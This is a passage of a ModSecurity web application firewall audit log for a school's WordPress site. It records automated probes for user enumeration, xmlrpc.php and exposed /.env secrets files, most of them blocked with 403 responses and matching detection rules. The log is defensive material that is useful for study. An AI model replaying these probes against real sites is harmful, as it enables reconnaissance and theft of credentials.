"17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849234692774 6046 (- - -) Stopwatch2: 1746849234692774 6046; combined=4418, p1=618, p2=3560, p3=31, p4=34, p5=102, sr=129, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --555aa615-Z-- --1c782e39-A-- [10/May/2025:10:54:49 +0700] aB7OCRLuBiaF9R054QBb6AAAAAk 103.236.140.4 55014 103.236.140.4 8181 --1c782e39-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --1c782e39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c782e39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849289170493 3329 (- - -) Stopwatch2: 1746849289170493 3329; combined=1422, p1=471, p2=910, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c782e39-Z-- --031d2b7f-A-- [10/May/2025:10:54:54 +0700] aB7ODhLuBiaF9R054QBb6gAAAAo 103.236.140.4 55018 103.236.140.4 8181 --031d2b7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --031d2b7f-C-- demo.sayHello --031d2b7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --031d2b7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849294812163 5699 (- - -) Stopwatch2: 1746849294812163 5699; combined=4217, p1=549, p2=3445, p3=33, p4=35, p5=93, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --031d2b7f-Z-- --07191f7c-A-- [10/May/2025:10:55:44 +0700] aB7OQBLuBiaF9R054QBb7AAAABA 103.236.140.4 55022 103.236.140.4 8181 --07191f7c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.116 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --07191f7c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07191f7c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746849344107621 3313 (- - -) Stopwatch2: 1746849344107621 3313; combined=1421, p1=474, p2=906, p3=0, p4=0, p5=40, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07191f7c-Z-- --35e2d83f-A-- [10/May/2025:10:55:50 +0700] aB7ORsi6w7GTj2w44Z6cdQAAAMw 103.236.140.4 55026 103.236.140.4 8181 --35e2d83f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --35e2d83f-C-- demo.sayHello --35e2d83f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --35e2d83f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746849350322325 5119 (- - -) Stopwatch2: 1746849350322325 5119; combined=3815, p1=451, p2=3144, p3=25, p4=25, p5=98, sr=68, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35e2d83f-Z-- --92b4524d-A-- [10/May/2025:11:03:54 +0700] aB7QKquC4AqLGUOyzyX8JAAAAIY 103.236.140.4 55078 103.236.140.4 8181 --92b4524d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 170.64.164.200 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 170.64.164.200 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --92b4524d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92b4524d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746849834875385 920 (- - -) Stopwatch2: 1746849834875385 920; combined=388, p1=347, p2=0, p3=0, p4=0, p5=41, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92b4524d-Z-- --027b7849-A-- [10/May/2025:11:31:35 +0700] aB7Wp9r9PbfRBMhzxmRbOQAAAE0 103.236.140.4 55202 103.236.140.4 8181 --027b7849-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.188.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.188.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --027b7849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --027b7849-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746851495314464 2298 (- - -) Stopwatch2: 1746851495314464 2298; combined=1228, p1=398, p2=799, p3=0, p4=0, p5=30, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --027b7849-Z-- --1f38373d-A-- [10/May/2025:11:35:47 +0700] aB7XoxLuBiaF9R054QBcBwAAAAs 103.236.140.4 55252 103.236.140.4 8181 --1f38373d-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 164.90.228.79 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 164.90.228.79 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1f38373d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1f38373d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746851747350161 746 (- - -) Stopwatch2: 1746851747350161 746; combined=344, p1=309, p2=0, p3=0, p4=0, p5=35, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1f38373d-Z-- --3f032745-A-- [10/May/2025:12:20:27 +0700] aB7iG9r9PbfRBMhzxmRc9AAAAEM 103.236.140.4 59200 103.236.140.4 8181 --3f032745-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 171.6.105.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 171.6.105.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3f032745-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f032745-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746854427642497 2887 (- - -) Stopwatch2: 1746854427642497 2887; combined=1253, p1=438, p2=785, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f032745-Z-- --cb755a57-A-- [10/May/2025:12:21:12 +0700] aB7iSMi6w7GTj2w44Z6efAAAAMI 103.236.140.4 59208 103.236.140.4 8181 --cb755a57-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.157.243.79 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.157.243.79 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb755a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb755a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746854472183693 3107 (- - -) Stopwatch2: 1746854472183693 3107; combined=1297, p1=431, p2=836, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb755a57-Z-- --449d2e4b-A-- [10/May/2025:12:29:33 +0700] aB7kPRLuBiaF9R054QBeqAAAAA4 103.236.140.4 59294 103.236.140.4 8181 --449d2e4b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 80.66.75.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 80.66.75.151 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 --449d2e4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --449d2e4b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746854973767210 864 (- - -) Stopwatch2: 1746854973767210 864; combined=347, p1=302, p2=0, p3=0, p4=0, p5=45, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --449d2e4b-Z-- --36848245-A-- [10/May/2025:12:38:52 +0700] aB7mbBLuBiaF9R054QBf1gAAAA4 103.236.140.4 34670 103.236.140.4 8181 --36848245-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.201 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36848245-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36848245-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746855532314758 2854 (- - -) Stopwatch2: 1746855532314758 2854; combined=1243, p1=446, p2=767, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36848245-Z-- --b8c11968-A-- [10/May/2025:12:39:00 +0700] aB7mdBLuBiaF9R054QBf2AAAABc 103.236.140.4 34674 103.236.140.4 8181 --b8c11968-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.77.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.77.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b8c11968-C-- demo.sayHello --b8c11968-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8c11968-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746855540111251 5725 (- - -) Stopwatch2: 1746855540111251 5725; combined=4228, p1=531, p2=3478, p3=31, p4=33, p5=92, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8c11968-Z-- --6acd6d40-A-- [10/May/2025:12:59:06 +0700] aB7rKhLuBiaF9R054QBf6gAAABQ 103.236.140.4 34786 103.236.140.4 8181 --6acd6d40-B-- GET / HTTP/1.0 Host: smkn22-jkt.sch.id Cookie: =; ueid= X-Real-IP: 194.121.51.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 194.121.51.172 X-Forwarded-Proto: http Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 Cache-Control: max-age=259200 --6acd6d40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6acd6d40-H-- Message: Access denied with code 403 (phase 1). Pattern match "(^|;)=(;|$)" at REQUEST_HEADERS:Cookie. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "74"] [id "220020"] [rev "2"] [msg "COMODO WAF: DoS vulnerability in Apache 2.2.17 - 2.2.21 (CVE-2012-0021)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746856746002079 863 (- - -) Stopwatch2: 1746856746002079 863; combined=340, p1=299, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6acd6d40-Z-- --9287134b-A-- [10/May/2025:13:01:45 +0700] aB7ryci6w7GTj2w44Z6gRgAAAME 103.236.140.4 34792 103.236.140.4 8181 --9287134b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.152 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9287134b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9287134b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746856905654011 3070 (- - -) Stopwatch2: 1746856905654011 3070; combined=1314, p1=452, p2=827, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9287134b-Z-- --06abd420-A-- [10/May/2025:13:01:49 +0700] aB7rzauC4AqLGUOyzyX_TwAAAI0 103.236.140.4 34796 103.236.140.4 8181 --06abd420-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.152 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.152 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --06abd420-C-- demo.sayHello --06abd420-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --06abd420-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746856909107452 5561 (- - -) Stopwatch2: 1746856909107452 5561; combined=4182, p1=529, p2=3429, p3=33, p4=33, p5=93, sr=72, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06abd420-Z-- --40fa6b40-A-- [10/May/2025:13:12:41 +0700] aB7uWRLuBiaF9R054QBf8AAAABA 103.236.140.4 34860 103.236.140.4 8181 --40fa6b40-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40fa6b40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40fa6b40-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746857561888898 3225 (- - -) Stopwatch2: 1746857561888898 3225; combined=1428, p1=504, p2=893, p3=0, p4=0, p5=31, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40fa6b40-Z-- --4f64632b-A-- [10/May/2025:13:12:46 +0700] aB7uXhLuBiaF9R054QBf8QAAABE 103.236.140.4 34864 103.236.140.4 8181 --4f64632b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.79.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.79.231 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4f64632b-C-- demo.sayHello --4f64632b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f64632b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746857566945115 5007 (- - -) Stopwatch2: 1746857566945115 5007; combined=3879, p1=469, p2=3198, p3=21, p4=24, p5=97, sr=67, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 